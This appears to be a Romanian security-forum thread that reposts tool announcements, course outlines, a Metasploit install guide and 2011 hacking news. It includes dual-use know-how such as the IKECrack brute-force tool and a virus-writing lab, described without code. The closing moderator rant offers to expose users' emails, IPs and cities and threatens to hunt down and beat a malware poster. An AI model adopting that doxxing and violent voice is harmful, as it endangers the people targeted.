Nytro

[h=1]Sophos Anti-Rootkit[/h][h=2]Free rootkit detection and removal tool[/h] [h=3]Important note[/h] We are currently working to enhance the detection power of the Sophos Anti-Rootkit Tool to better find and remove the latest forms of rootkits. This updated version will be available to download in February 2012. Should you have any questions about the current version of this tool, please visit our SophosFreeTalk Community. [h=3]Rootkit scanning, detection and removal[/h] Our free software, Sophos Anti-Rootkit scans, detects and removes any rootkit that is hidden on your computer using advanced rootkit detection technology. Rootkits can lie hidden on computers and remain undetected by antivirus software. Although new rootkits can be prevented from infecting the system, if you had any rootkits before you installed your antivirus, they may never be revealed. Removing rootkits without compromising system integrity is particularly challenging and needs to be done with care. [h=3]Simplified management[/h] Using Sophos Anti-Rootkit is easy. Whether you use its simple graphical user interface or run it from the command line, you can easily detect and remove any rootkits on your computer. [h=3]Easy to use[/h] Sophos Anti-Rootkit provides an extra layer of protection, by safely and reliably detecting and removing any rootkit that might have hidden itself on your system. [h=3]Stay free of rootkits[/h] As part of its complete protection of endpoint computers, Sophos Endpoint Security and Data Protection has an integrated detection functionality that removes and prevents them being installed onto your desktops, laptops and servers. Download: http://www.sophos.com/en-us/products/free-tools/sophos-anti-rootkit/download.aspx Sursa: Sophos Anti-Rootkit - Free Rootkit Detection and Removal Tool Via: Top 3 Tools To Remove Rootkits and Prevent Them from Infecting Your PC

Trend Micro? RootkitBuster? 5.00 Beta Released: 2011-08-15 Download: http://www.trendmicro.com/ftp/products/rootkitbuster/RootkitBuster_5.00.1041.zip Sursa: Top 3 Tools To Remove Rootkits and Prevent Them from Infecting Your PC

[h=1]Kindle Fire gets a bite of Android 4.0 Ice Cream Sandwich[/h]December 26, 2011 | Devindra Hardawar Well that didn’t take very long. Amazon’s Kindle Fire tablet — which you’ve likely seen gifted quite a bit this holiday season — has been hacked to run a “pre-alpha” version of Android 4.0 Ice Cream Sandwich. You can thank the intrepid hackers over at the xda-developers forum for the release, which marks the first time Android 4.0 has hit the Kindle Fire. A hack such as this is likely the only way Kindle Fire owners can get their hands on Android 4.0. Given the hefty hardware requirements for Android 4.0 devices, plus Amazon’s need for a highly customized user interface on the Kindle Fire, you’ll likely never see an official Ice Cream Sandwich release on the tablet. The hack, which is based on the custom Android firmware CyanogenMod 9, is certainly far from complete. Audio and graphical glitches (especially while playing videos) abound, and touch screen interaction seems fairly unresponsive, according to the above video from Liliputing. Still, it’s a mighty first step for Kindle Fire hackers, and it’s likely the first of many such releases from various development groups. Given it’s $200 price and wide availability, the Kindle Fire is the new target for any hacker looking to make a name for themselves. Via The Verge Sursa: Kindle Fire gets a bite of Android 4.0 Ice Cream Sandwich | VentureBeat

Cuckoo Sandbox Automated Malware Analysis System In three words, Cuckoo Sandbox is a malware analysis system. Its goal is to provide you a way to automatically analyze files and collect comprehensive results describing and outlining what such files do while executed inside an isolated environment. It's mostly used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine. But it can do much more... It's up to you to discover what and how. Some of the results that Cuckoo generates are: Trace of performed relevant win32 API calls Dump of network traffic generated during analysis Creation of screenshots taken during analysis Dump of files created, deleted and downloaded by the malware during analysis Trace of assembly instructions executed by malware process In addition, Cuckoo allows you to: Automate submission of analysis tasks Create analysis packages to define custom operations and procedures for performing an analysis Run multiple virtual machines concurrently Script the process and correlation of analysis results data Script and automate the generation of reports in the format you prefer Download Current Cuckoo Sandbox's version is 0.3. http://www.cuckoobox.org/downloads/0.3/cuckoo_0.3.tar.gz Docs: http://www.cuckoobox.org/doc/0.3/latex/CuckooSandbox.pdf Demo: Sursa: Cuckoo Sandbox

GoDaddy loses 21,000 domains in a day By Natalie Weinstein on Dec 27, 2011 Domain registrar Go Daddy lost over 21,000 domains yesterday. It could be a coincidence--or it could be the result of the company's PR debacle over its support for the Stop Online Piracy Act. Yesterday, Go Daddy actually reversed course and dropped its support for the controversial legislation. "Go Daddy will support it when and if the Internet community supports it," Go Daddy CEO Warren Adelman announced in a statement. SOPA, introduced in Congress this fall, would make it easier for the Justice Department to shut down sites allegedly dedicated to piracy. An anti-Go Daddy thread on social site Reddit led to the creation of Godaddyboycott.org, a site set up to let people amass their disapproval with the company's support of SOPA. While 21,054 domains transferred out Friday of Domaincontrol.com--which is managed by Go Daddy--it is only fair to note that 20,034 transferred in the same day, according to domain tracker Dailychanges.com According to techie site TheNextWeb.com, though, the transfers-out have been building over the course of the week, with 8,800 reported on Monday and 14,500 on Wednesday. Go Daddy did not immediately respond to CNET's request for comment. Via CNET Sursa: GoDaddy loses 21,000 domains in a day - Crave - CNET Asia

[h=1]Audit Windows Passwords With Password Security Scanner[/h] Keeping track of all accounts and passwords can be a daunting task for some users. One reason for that is that most use multiple applications that may require passwords. Think of desktop email clients, instant messengers or web browsers for instance. Even if you are using a password manager like KeePass, you will usually have programs that save account information and passwords for you. That’s a problem if you want an overview of all passwords, or want to make sure that all are secure. The new Nirsoft application Password Security Scanner has been designed to audit Windows passwords. The first release supports auditing passwords stored in Internet Explorer, Mozilla Firefox, MSN, Microsoft Outlook, Windows Live Mail and, dialup and vpn passwords. The program scans the operating system for all supported programs and displays all passwords that it finds in a list. Password Security Scanner lists the item name (usually a domain name), the type (browser, email), application the password was found in, the username, password length, the password strength, and even the type of characters used by the password. Firefox users need to disable the master password if set up, as it blocks access to the password list. This is done under Options > Security > Master Password in the browser. The password length and strength give detailed information about a password’s security. The information may for instance be used to change weak passwords on the system. Keep in mind though that all passwords read by the application are accessibly openly on the system. Someone with direct access to the PC could retrieve the account information regardless of password length. Users can however use the information to delete passwords that are out in the open on their system. While that may not always be a practicable solution, it may work in some cases. The data can be exported into text, csv and xml files, and HTML reports. Windows users can download the portable program from the official program website. Sursa: Audit Windows Passwords With Password Security Scanner

[h=1]This is what a 5MB hard drive looked like in 1956[/h] 26th December 2011 by Zee ‘In September 1956 IBM launched the 305 RAMAC, the first ‘SUPER’ computer with a hard disk drive (HDD). The HDD weighed over a ton and stored 5 MB of data.’ Texomatube via Retronaught (Thanks @Atul) Sursa: What a 5MB Hard Drive Looked Like in 1956

Hacktivity 2011 - Yaniv Miron: SCADA Dismal or bang-bang SCADA Sursa: Hacktivity 2011 - Yaniv Miron: SCADA Dismal or bang-bang SCADA on Vimeo

[h=1]Naval researchers pioneer TCP-based spam detection[/h] [h=2]A group of researchers has built a SpamAssassin that detects spam by TCP usage[/h] By Joab Jackson December 23, 2011, 4:39 PM — A group of researchers from the U.S. Naval Academy has developed a technique for analyzing email traffic in real-time to identify spam messages as they come across the wire, simply using information from the TCP (Transmission Control Protocol) packets that carry the messages. This approach could be a useful addition to the arsenal of today's spam-fighting techniques, observers argue, in that, unlike other typical spam fighting approaches, the content of the email does not have to be scanned. The work "advanced both the science of spam fighting and ... worked through all the engineering challenges of getting these techniques built into the most popular open-source spam filter," said Massachusetts Institute of Technology computer science research affiliate Steve Bauer, who was not involved with the work. "So this is both a clever bit of research and genuinely practical contribution to the persistent problem of fighting spam." Researchers Robert Beverly, Georgios Kakavelakis and Joel Young built a plug-in for the SpamAssassin mail filter, called SpamFlow, that incorporates their analysis techniques. They presented their work at the Usenix Large Installation System Administration (LISA) conference arlier this month in Boston. In the paper that accompanied the presentation, the researchers showed that spam email blasts have certain characteristics at the networking transport layer. Signal analysis of factors such as timing, packet reordering, congestion and flow control can reveal the work of a spam-spewing botnet. "A lot of spam comes from spambots, which are sending as fast as they can and congesting their local uplink," Beverly said. "So you can detect them by looking really hard at the TCP stream." Thus far, earlier techniques developed for analyzing spam at the network transport layer have been offline, which is to say, the email traffic is analyzed as a batch, and the results can be used later. The naval researchers have developed an architecture for analyzing network traffic as it comes over the wire. For the implementation, they used the the SpamAssassin email filter. SpamAssassin has a plug-in architecture for incorporate new filtering techniques. "We have a daemon that captures all the packets and looks timing and other congestion characteristics of the traffic stream," Beverly said. The plug-in can learn to identify and detect spam without human intervention. In tests, SpamFlow was able to correctly identify spam over 95 percent of the time, after a reception of 1,000 emails. The ability to detect a spam message without actually examining the contents of the message would be handy in a number of situations, noted Bruce Davie, a Cisco fellow and visiting lecturer at MIT. Davie is familiar with though not involved in the work. An Internet service provider could apply the detection algorithm without violating users' privacy. It can be used to detect messages that are encrypted, such as those traveling over an encrypted link. It can also be used to detect other forms of malicious traffic, such as port scans from botnet hosts. "Overall, I see it as a generally useful tool in the fight against malicious traffic," Davie said. "You can combine it with traditional anti-spam techniques to improve accuracy." Currently, the team is beta testing the software at a number of locations. They plan to release it as open-source software afterward. The U.S. National Science Foundation funded part of this work, under the Software Development for Cyberinfrastructure (SDCI) program. Sursa: Naval researchers pioneer TCP-based spam detection | ITworld

Sandcat Pro v4.2.8 adds NoSQL Injection detection By MaxiSoler on 27 December 2011 in Tools with No Comments Sandcat combines Syhunt’s state-of-the-art, multi-process scanning technologies with the incredibly fast Lua language to perform remote web application security scans. While spidering a web site and hunting vulnerabilities, Sandcat emulates a modern, HTML 5-aware web browser, making sure every web application gets fully tested. Changelog v4.2.8 This version adds techniques for detecting vulnerabilities in web applications using NoSQL database engines and web systems supporting server-side JavaScript execution. This includes NoSQL injection, blind NoSQL injection & Denial-of-Service vulnerabilities. Also the enhanced versions of the Sandcat Code scanner with source code checks for these specific vulnerability classes, and publishing an article (Time-Based NoSQL Injection, available here) that highlights additional risks involving server-side JavaScript execution not restricted to NoSQL database engines. Download: http://www.syhunt.com/?n=Sandcat.Download Sursa: Sandcat Pro v4.2.8 adds NoSQL Injection detection

[h=3]IKECrack[/h]IKECrack is an open source IKE/IPSec authentication crack tool. This tool is designed to bruteforce or dictionary attack the key/password used with Pre-Shared-Key [PSK] IKE authentication. The open source version of this tool is to demonstrate proof-of-concept, and will work with RFC 2409 based aggressive mode PSK authentication. Our SourceForge development area is at IKECrack | Free Security & Utilities software downloads at SourceForge.net [h=4]Presentation Materials and Additional Tools[/h] My ToorCon 2K2 preso on IKE hacking can be downloaded here The IKEProber tool mentioned in the preso can be downloaded here [h=4]IKE Agressive Mode BruteForce Summary[/h] Aggressive Mode IKE authentication is composed of the following steps: 1 - Initiating client sends encryption options proposal, DH public key, random number [nonce_i], and an ID in an un-encrypted packet to the gateway/responder. 2 - Responder creates a DH public value, another random number [nonce_r], and calculates a HASH that is sent back to the initiator in an un-encrypted packet. This hash is used to authenticate the parties to each other, and is based on the exchange nonces, DH public values, the initiator ID, other values from the initiator packet, and the Pre-Shared-Key [PSK]. 3 - The Initiating client sends a reply packet also containing a HASH, but this response is normally sent in an encrypted packet. IKECrack utilizies the HASH sent in step 2, and attempts a realtime bruteforce of the PSK. This involves a HMAC-MD5 of the PSK with nonce values to determine the SKEYID, and a HMAC-MD5 of the SKEYID with DH pubkeys, cookies, ID, and SA proposal. In practice, SKEYID and HASH_R are calculated with the Hash cipher proposed by the initiator, so could actually be either SHA1 or MD5 in HMAC mode. [h=4]Project Details[/h] IKECrack utilizes components from the following OpenSource/PublicDomain programs MDCrack HiFn Linux Drivers - HiFn makes one of the better commercial encryption/compression accelerators. I have access to 7751 based PCI cards, and plan one for offloading MD5, SHA1,DES, and 3DES Author: Anton T. Rager Ron Rivest's MD5 Simeon Pilgrim's Reverse MD5 MD5 and HMAC-MD5 PerlMods libpcap [h=4]Performance[/h] Initial tesing with Perl based IKECrack shows numbers of 18,000 tests per second with a PIII 700, and can bruteforce 3 chars of ucase/lcase/0-9 in 13 seconds. MDCrack [a MD5 bruteforce tool] can achieve 1.5 million keys per second with pure MD5 and a PIII 700. PSK bruteforcing consists of 4 MD5's, and 4 64 byte XORs....but should still be able to achieve 375,000 IKE keys per second. Preliminary tests in C have shown 26,000 keys per second with un-optimized routines. I'm hoping that Simeon Pilgrim's MD5 routines will speed this up a bit more. [h=4]Cool Links[/h] Other projects we are considering integrating into IKECrack dkbf - An open source distributed NT LANMan/Hash cracker using MPI - An IKECrack cluster! Download: http://sourceforge.net/projects/ikecrack/files/latest/download Sursa: IKECrack - Bruteforce crack for IPSec

[h=2]A Robot… That Can See Through Walls![/h] posted Dec 26th 2011 3:56pm by Jeremy Cook Robots on four wheels are fun on their own merits, but one thing that most lack is the ability to see through walls. With it’s onboard radar system, this bot is equipped to see objects that a person couldn’t normally detect on the other side of the wall. Although some of the more “nuts and bolts” details of this build are missing, the robot uses an Ultra-Wideband Radar system called the [D1] Radar System. This system can, according to their documentation, “Avoid false positives caused by vapor, dust, smoke, rain or other small particles.” Apparently this means drywall as well if programmed correctly. In the video after the break, the robot’s sensor package is programmed to ignore anything within 1.5 meters. This allows the robot to mirror the movement of the apparent shelving unit on the other side. This sensor could certainly have some interesting robotics applications besides imitating a rolling shelf, so we’re excited to see what it will be used for! Sursa: A Robot… That Can See Through Walls! - Hack a Day

The Life of Binaries Creator: Xeno Kovah License: Creative Commons Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/) Lab Requirements: Requires a Windows system with Visual C++ Express Edition, Windows DDK or WDK kernel module compilation environment, and WinDbg. Requires a Windows guest OS running in VMWare Player or VMWare Server in order to do kernel debugging with WinDbg from the host OS. Recommended Class Duration: 3 days (class previously taught in 2 days which was too little) Creator Available for Training: Yes Author Comments: Topics include but are not limited to: •Scanning and tokenizing source code. •Parsing a grammar. •Different targets for x86 assembly object files generation. (E.g. relocatable vs. position independent code). •Linking object files together to create a well-formed binary. •Detailed descriptions of the high level similarities and low level differences between the Windows PE and Linux ELF binary formats. (NOTE: we didn't get to this in the class where the video was recorded, but the materials are in the slides) •How an OS loads a binary into memory and links it on the fly before executing it. Along the way we discuss the relevance of security at different stages of a binary’s life, from the tricks that can be played by a malicious compiler, to how viruses really work, to the way which malware “packers” duplicate OS process execution functionality, to the benefit of a security-enhanced OS loader which implements address space layout randomization (ASLR). Lab work includes: •Manipulating compiler options to change the type of assembly which is output •Manipulating linker options to change the structure of binary formats •Reading and understanding PE files with PEView •Reading and understanding ELF files with Readelf (NOTE: we didn't get to this in the class where the video was recorded, but the materials are in the slides) •Using WinDbg and/or GDB to watch the loader dynamically link an executable •Using Thread Local Storage (TLS) to obfuscate control flow and serve as a basic anti-debug mechanism •Creating a simple example virus for PE •Analyze the changes made to the binary format when a file is packed with UPX •Using the rootkit technique of Import Address Table (IAT) hooking to subvert the integrity of a program’s calls to external libraries, allowing files to be hidden. Knowledge of this material is recommended, but not required, for future classes such as Rootkits, but is required for reverse engineering. To submit any suggestions, corrections, or explanations of things I didn’t know the reasons for, please email me at the address included in the slides. All Materials LoBSlidesOnly.zip LoBCodeOnly.zip Videos of the class hosted at archive.org. These are useful for students, but also more useful for potential instructors who would like to teach this material. By watching the video, you will better understand the intent of some slides which do not stand on their own. You are recommended to watch the largest size video so that the most possible text is visible without having to follow along in the slides: Online: Day 1 Part 1 Day 1 Part 2 Day 1 Part 3 Day 1 Part 4 Day 1 Part 5 Day 1 Part 6 Day 2 Part 1 Day 2 Part 2 Day 2 Part 3 Day 2 Part 4 Day 2 Part 5 Day 2 Part 6 Download videos: http://www.archive.org/download/TheLifeOfBinariesDay1Part1/PR_LifeOfBinariesDay1Part1.mp4 http://www.archive.org/download/TheLifeOfBinariesDay1Part2/PR_LifeOfBinariesDay1Part2.mp4 http://www.archive.org/download/TheLifeOfBinariesDay1Part3/PR_LifeOfBinariesDay1Part3.mp4 http://www.archive.org/download/TheLifeOfBinariesDay1Part4/PR_LifeOfBinariesDay1Part4.mp4 http://www.archive.org/download/TheLifeOfBinariesDay1Part5/PR_LifeOfBinariesDay1Part5.mp4 http://www.archive.org/download/TheLifeOfBinariesDay1Part6/PR_LifeOfBinariesDay1Part6.mp4 http://www.archive.org/download/TheLifeOfBinariesDay2Part1/PR_LifeOfBinariesDay2Part1.mp4 http://www.archive.org/download/TheLifeOfBinariesDay2Part2/PR_LifeOfBinariesDay2Part2.mp4 http://www.archive.org/download/TheLifeOfBinariesDay2Part3/PR_LifeOfBinariesDay2Part3.mp4 http://www.archive.org/download/TheLifeOfBinariesDay2Part4/PR_LifeOfBinariesDay2Part4.mp4 http://www.archive.org/download/TheLifeOfBinariesDay2Part5/PR_LifeOfBinariesDay2Part5.mp4 http://www.archive.org/download/TheLifeOfBinariesDay2Part6/PR_LifeOfBinariesDay2Part6.mp4 Revision History: 09-06-2011 - Videos uploaded 02-16-2011 - Initial class content upload If you have used and modified this material, we would appreciate it if you submit your modified version for publishing here, so that all versions can benefit from your changes. Sursa: LifeOfBinaries

Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration Creator: Xeno Kovah License: Creative Commons Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/) Lab Requirements: Requires a Windows system with Visual C++ Express Edition. Requires a Linux system with gcc and gdb, and the CMU binary bomb installed. Either system can be physical or virtual. Recommended Class Duration: 2-3 days Creator Available for Training: Yes Author Comments: Intel processors have been a major force in personal computing for more than 30 years. An understanding of low level computing mechanisms used in Intel chips as taught in this course serves as a foundation upon which to better understand other hardware, as well as many technical specialties such as reverse engineering, compiler design, operating system design, code optimization, and vulnerability exploitation. 25% of the time will be spent bootstrapping knowledge of fully OS-independent aspects of Intel architecture. 50% will be spent learning Windows tools and analysis of simple programs. The final 25% of time will be spent learning Linux tools for analysis. This class serves as a foundation for the follow on Intermediate level x86 class. It teaches the basic concepts and describes the hardware that assembly code deals with. It also goes over many of the most common assembly instructions. Although x86 has hundreds of special purpose instructions, students will be shown it is possible to read most programs by knowing only around 20-30 instructions and their variations. The instructor-led lab work will include: * Stepping through a small program and watching the changes to the stack at each instruction (push, pop, call, ret (return), mov) * Stepping through a slightly more complicated program (adds lea(load effective address), add, sub) * Understanding the correspondence between C and assembly control transfer mechanisms (e.g. goto in C == jmp in ams) * Understanding conditional control flow and how loops are translated from C to asm(conditional jumps, jge(jump greater than or equal), jle(jump less than or equal), ja(jump above), cmp (compare), test, etc) * Boolean logic (and, or, xor, not) * Logical and Arithmetic bit shift instructions and the cases where each would be used (shl (logical shift left), shr (logical shift right), sal (arithmetic shift left), sar(arithmetic shift right)) * Signed and unsigned multiplication and division * Special one instruction loops and how C functions like memset or memcpy can be implemented in one instruction plus setup (rep stos (repeat store to string), rep mov (repeat mov) * Misc instructions like leave and nop (no operation) * Running examples in the Visual Studio debugger on Windows and the Gnu Debugger (GDB) on Linux * The famous "binary bomb" lab from the Carnegie Mellon University computer architecture class, which requires the student to do basic reverse engineering to progress through the different phases of the bomb giving the correct input to avoid it “blowing up”. This will be an independent activity. Knowledge of this material is a prerequisite for future classes such as Intermediate x86, Rootkits, Exploits, and Introduction to Reverse Engineering. To submit any suggestions, corrections, or explanations of things I didn’t know the reasons for, please email me at the address included in the slides. All Materials IntroX86SlidesOnly.zip IntroX86CodeOnly.zip Videos of the class hosted at archive.org. These are useful for students, but also more useful for potential instructors who would like to teach this material. By watching the video, you will better understand the intent of some slides which do not stand on their own. You are recommended to watch the largest size video so that the most possible text is visible without having to follow along in the slides: Online: Day 1 Part 1 Day 1 Part 2 Day 1 Part 3 Day 1 Part 4 Day 1 Part 5 Day 2 Part 1 Day 2 Part 2 Day 2 Part 3 Day 2 Part 4 Day 2 Part 5 Day 2 Part 6 Download videos: - http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay1Part1/PR_IntroX86_Day1_Part1.mp4 - http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay1Part2/PR_IntroX86_Day1_Part2.mp4 - http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay1Part3/PR_IntroX86_Day1_Part3.mp4 - http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay1Part4/PR_IntroX86_Day1_Part4.mp4 - http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay1Part5/PR_IntroX86_Day1_Part5.mp4 - http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay2Part1/PR_IntroX86_Day2_Part1.mp4 - http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay2Part2/PR_IntroX86_Day2_Part2.mp4 - http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay2Part3/PR_IntroX86_Day2_Part3.mp4 - http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay2Part4/PR_IntroX86_Day2_Part4.mp4 - http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay2Part5/PR_IntroX86_Day2_Part5.mp4 - http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay2Part6/PR_IntroX86_Day2_Part6.mp4 Revision History: 06-27-2011 - Videos uploaded 02-16-2011 - Initial class content upload If you have used and modified this material, we would appreciate it if you submit your modified version for publishing here, so that all versions can benefit from your changes. Sursa: IntroX86

x86/x64 Instruction Set Reference This is an unofficial online version of the Intel 64 instruction set reference. It provides a list of the available instructions for IA-32 and Intel 64 microprocessors, their assembly mnemonics, encodings, descriptions, pseudo code and the exceptions they can throw. This information is largely compatible with AMD64 processors, except for some minor differences. Link: http://siyobik.info/main/reference

Guide to Installing Metasploit 4 and Armitage on Mac OSX Lion 12-26-11 After many hours of trial and error, I have been able to put together a guide to getting Metasploit 4 and Armitage working properly on Mac OSX. I would also like to give a tremendous amount of credit to BrianCanFixIT @ Faulty Logic. His blog post on setting up Armitage helped me through the missing piece of getting the PostgreSQL database up and running properly. [h=3]Prerequisites[/h] Install XCode (I am running v4.2) [h=3]PostgreSQL Installation[/h] Download and Install PostgreSQL via the free GUI installer. Setup your root PostgreSQL password during installation. Launch the newly installed PGAdmin III application. Connect (double click) on the local PostgreSQL database and enter your root password when prompted. Under the PostgreSQL drop down, right click on “Login Roles”, and select “New Login Role” Set the role name to msfuser. Click on the definition tab, and set the password as msfpassword. Click OK to continue. Next, right click on the databases list, and select “New Database”. Set the name to metasploitdb, and set the owner to msfuser. Press OK, and we’re done. You can close PGAdmin. [h=3]MacPorts[/h] Download and install MacPorts from http://www.macports.org/install.php Good Tip: add “/opt/local” to your spotlight privacy settings to avoid excessive compile times & unnecessary indexing by spotlight. (System Preferences->Spotlight->Privacy->”+”) Quit terminal & relaunch to accept new path settings added by MacPorts [h=3]Install Ruby, RubyGems (PostgreSQL and MsgPack)[/h] # Run as Root sudo bash # Update MacPorts port selfupdate #Install Ruby port install ruby19 +nosuffix # Install PostgreSQL gem connector (64bit Systems) env ARCHFLAGS='-arch x86_64' gem install pg -- --with-opt-include=/Library/PostgreSQL/9.1/include/ --with-opt-lib=/Library/PostgreSQL/9.1/lib/ #Install Ruby Msgpack port install msgpack #Install the gem MSGPACK gem install msgpack # Add Ruby to your path export PATH=/opt/msf3:$PATH # Ensure that /opt/local/bin appears before /usr/bin, else edit ~/.bash_profile file and source it echo $PATH [h=3]Metasploit 4 Installation[/h] # Download Metasploit via Subversion sudo svn co https://www.metasploit.com/svn/framework3/trunk/ /opt/local/msf/ # Create a system link to the msf applications # This is done because including it in your path configuration doesn't seem to work. sudo ln -s /opt/local/msf/msf* /opt/local/bin [h=3]Configure the Metasploit Database[/h] # Create the configuration directory sudo mkdir /opt/local/config # Create/Edit the following file sudo vi /opt/local/config/database.yml # Include the following in your database.yml file # These settings are for the database used by the Metasploit Framework # unstable tree included in this installer, not the commercial editions. # production: adapter: "postgresql" database: "metasploitdb" username: "msfuser" password: "msfpassword" port: 5432 host: "localhost" pool: 256 timeout: 5</code> [h=3]Running Metasploit and Armitage[/h] # Include the database location in your config export MSF_DATABASE_CONFIG=/opt/local/config/database.yml # Launch Metasploit sudo msfrpcd -U msfuser2 -P msfpassword2 -t Msg # Launch Armitage sudo armitage [h=3]Enjoy![/h] Sursa: http://www.nightlion.net/guides/2011/guide-to-installing-metasploit-4-and-armitage-on-mac-osx-lion/

Android App permisions THESE AREN’T THE PERMISSIONS YOU’RE LOOKING FOR Anthony Lineberry David Luke Richardson Tim Wyatt DefCon 18 • Android Internals Overview • Security/Permission Model • Why Ask For Permission When You Can Ask For Forgiveness? • Log-Cat – Our Inside Mole • The Ultimate Permission (Yes, we’re talking about root) • Mitigation Download: https://www.defcon.org/images/defcon-18/dc-18-presentations/Lineberry/DEFCON-18-Lineberry-Not-The-Permissions-You-Are-Looking-For.pdf

Top 10 hacking scandals of 2011 Sonakshi Babbar, Hindustan Times New Delhi, December 27, 2011 As more and more celebrities join the social networking bandwagon, they also become increasingly vulnerable to hacking. From heads of states to Hollywood celebrities, this year saw a series of hacking incidents involving high-profile victims. Check out the most controversial ones. Selena Gomez Selena Gomez's Twitter and Facebook fans woke up to an uncharacteristic post about her boyfriend Justin Bieber. The venomous post screamed "Oh yeah, JUSTIN BIEBER SUCKS!!!!!!!". The teen singer immediately clarified that it was a case of hacking and she had nothing to do with the post. Ashton Kutcher Hollywood star Ashton Kutcher, who used to host the celebrity prank show, Punk'd, got a taste of is medicine his Twitter account @aplusk was hacked. A tweet sent to his followers said, "Ashton, you've been Punk'd. This account is not secure. Dude, where's my SSL?" Kim Kardashian Kim Kardashian went into a panic mode when her Twitter account was hacked by internet pranksters this year. On discovering fake tweets posted by an imposter, the socialite appealed to bosses of the site to help restore the security on her account. Sony PlayStation In one of the biggest data breaches, Sony admitted to an external intrusion which exposed personal information of 77 million PlayStation Network users. The PlayStation maker warned users that the hackers might have access to customers' vital information, including names, birthdates, physical and e-mail addresses, and logins, handles and credit card details. Research in Motion Hackers defaced a website belonging to Blackberry maker Research in Motion soon after the company revealed its plans to support police investigating the London riots. The hackers posted on the blog: "No Blackberry you will NOT assist the police." Blackberry took off the blog briefly and restored it to its original form. Facebook In one of the most shocking security breach incident, around two lakh Facebook accounts were hacked in Bangalore. The users' photos and videos were morphed and the sleazy links mailed to friends and families overnight. Lady Gaga A scam on Lady Gaga's Facebook page fooled many fans into clicking the link to win an iPad. The contest rules and registration were presented as a link to a Blogspot page. "Lady Gaga's new iPad comes out in 3 days! So for the next 72 hours we will be hosting a massive giveaway to all the Mother Monster fans. Sign up and receive your special Lady Gaga edition iPad in time for the Holidays!" hackers posted on her Facebook page. The presence of the fake iPad offer didn't go unnoticed, and was taken down within an hour. Nicolas Sarkozy Hackers played a cruel joke on French President Nicolas Sarkozy when they posted a fake resignation letter from his Facebook page. The post, which went out to more than 350,000 'friends' of the head of the state read like this: "Dear compatriots, given the exceptional circumstances our country is experiencing, I have decided in my spirit and conscience not to run for office again at the end of my mandate in 2012". Yingluck Shinawatra Thailand's Prime Minister, Yingluck Shinawatra, fell victim to the hacking menace when her Twitter account was hacked. Her followers received tweets criticizing her political experience and incompetence. The tweets also suggested that she was her brother's (former Prime Minister - Thaksin Shinawatra) puppet. Fox News While celebrities and popular figures have been the target of hackers, it was media house Fox News who faced their ire in July this year. In a gruesome joke, the hackers tweeted the death of president Obama. Some of the tweets read like this: @BarackObama has just passed. The President is dead. A sad 4th of July, indeed. President Barack Obama is dead." This was followed by more on the same lines claiming that Obama was shot at a restaurant while campaigning. Sursa: Top 10 hacking scandals of 2011 - Hindustan Times

Bixxtonim si HJOCONCEPT95 - ban amandoi. PS: Nu urmaresc topicurile astea.

Sefu, analiza unui malware nu se face in 30 de secunde. Dureaza mult sa analizezi un fisier, si nu am de gand sa stau cate o jumatate de ora sa verific un pogram de cacat, gen stealer/crypter sau ce alte rahaturi cautati voi, pentru ca din moment ce vieniti aici sa descarcati un stealer,crypter, Havij sau altele, e clar ca faceti umbra pamantului degeaba, ca sunteti niste script-kiddies cu aere de hackeri si nu aveti ce cauta aici. Cu alte cuvinte ma doare in cur ca va infectati voi incercand sa descarcati cine stie ce porcarie de program. Daca ati fii seriosi si nu v-ati ocupa cu rahaturi dintr-astea nu ati avea nicio problema. Intre timp esti liber sa iei fiecare program de cacat de aici, din aceasta categorie si sa il analizezi. Te uiti si tu la stringuri pentru inceput, verifici resursele executabilului si vezi daca pe acolo mai este un executabil, verifici sectiunile si vezi daca dai de una suspecta, verifici tabela de importuri, scanezi pe virustotal si anubis pentru inceput, instalezi pe o masina virtuala Wireshark sa vezi daca trimite date, Process Monitor sa vezi ce API-uri apeleaza, Autoruns sa vezi daca se pune la startup, GMER anti-rootkit sa vezi daca dracia are cumva un mic rootkit, apoi mai faci si putin debugging, verifici daca de la Entrypoint face un jmp catre cine stie ce functie, apoi return la Entrypoint, faci snapshot-uri la sistemul de fisiere si Registry si verifici daca se modifica ceva, verifici daca ruleaza intr-un sandbox, dezasamblezi si vezi daca la Main() verifica prezenta unui Sandbox/VM si multe altele. Apoi postezi in topicul respectiv un rezumat complet, spui "Ba ratatule, uite, e infectat pentru ca Entry-point-ul e de fapt un jmp la o un shellcode de download and execute" iar eu sterg link-ul de download, mut topicul la gunoi, iar cel care a postat primeste ban permanent. De asemenea poti face datele descoperite punlice, gen "incearca sa trimita mail la "vasile@gmail.com" iar eu iti pot face publice adresa de mail folosita aici pe forum, sau IP-urile si te anunt din ce oras e. Apoi, daca chiar te-a suparat persoana respectiva, o cautam pe facebook sau alte site-uri, aflam cat putem despre el si mergem si ii futem o mama de bataie si lui si lu' ma-sa ca l-a facut prost si vrea sa ne fure noua parolele de Facebook. Insa cat timp tu ai doar pretentii, iti tii gura si nu mai comentezi aiurea, nu se implica nimeni sa verifice programele de cacat postate aici, poate daca era vorba de un program serios da, dar Havij? Daca esti bun nu ai nevoie de asa ceva, ai nevoie doar de un browser, insa script-kiddie fiind, meriti sa executi toate programele infectat pentru ca nici nu stii ce e o masina virtuala sau macar un sandbox.

